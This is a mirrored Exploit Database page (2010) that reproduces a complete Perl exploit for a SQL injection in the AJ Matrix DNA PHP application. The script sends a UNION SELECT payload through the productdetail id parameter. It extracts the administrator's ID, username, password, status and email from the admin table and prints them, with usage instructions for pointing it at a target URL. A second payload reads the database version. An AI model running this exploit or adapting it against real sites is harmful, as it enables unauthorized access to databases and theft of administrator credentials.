AJ Matrix DNA – SQL Injection

• Exploit Database
• 116 阅读

• 作者： Br0ly
  日期： 2010-12-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15718/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131

  #!/usr/bin/perl #|------------------------------------------------------------------------------------------------------------------ #| -Info: # #| -Name: AJ Matrix DNA #| -Site: http://www.ajsquare.com/ajhome.php #| -Bug: Sql Injection #| -Found: by Br0ly #| -BRAZIL >D #| -Contact: br0ly[dot]Code[at]gmail[dot]com #| #| -Gretz: Osirys , Out0fBound #| #| -p0c: #| -SQL INJECTION: #| #| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15-- #| #|-------------------------------------- #|-AJ Matrix DNA #| -Sql Injection #| -by Br0ly #|-------------------------------------- #| #| #| #| #| >D, And sorry for my bad english ;/ #| #|   use IO::Socket::INET; use LWP::UserAgent;   my $host= $ARGV[0]; my $sql_path = "/index.php?do=productdetail&id=";     if (@ARGV < 1) { &banner(); &help("-1"); }   elsif(cheek($host) == 1) { &banner(); &xploit($host,$sql_path); }   else { &banner(); help("-2"); }   sub xploit() {   my $host = $_[0]; my $sql_path = $_[1];   print "[+] Getting the id,login,pass,status of the admin.\n";   my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--"; my $sql_get = get_url($sql_atk); my $connect = tag($sql_get);   if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) { print "[+] ID = $1\n"; print "[+] User = $2\n"; print "[+] Pass = $3\n"; print "[+] Status = $4\n"; print "[+] Email= $5\n"; exit(0); } else { print "[-] Exploit, Fail\n"; exit(0);   } }   sub get_url() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(4); my $response = $ua->request($req); return $response->content; }   sub tag() { my $string = $_[0]; $string =~ s/ /\$/g; $string =~ s/\s/\*/g; return($string); }   sub cheek() { my $host= $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } }   sub help() {   my $error = $_[0]; if ($error == -1) { print "\n[-] Error, missed some arguments !\n\n"; }   elsif ($error == -2) {   print "\n[-] Error, Bad arguments !\n"; }   print "[*] Usage : perl $0 http://localhost/ajmatrixdna/\n\n"; print "Ex: perl $0 http://localhost/ajmatrixdna/\n\n"; exit(0); }   sub banner { print "\n". "--------------------------------------\n". " -AJ Matrix DNA \n". " -Sql Injection \n". " -by Br0ly\n". "--------------------------------------\n\n"; }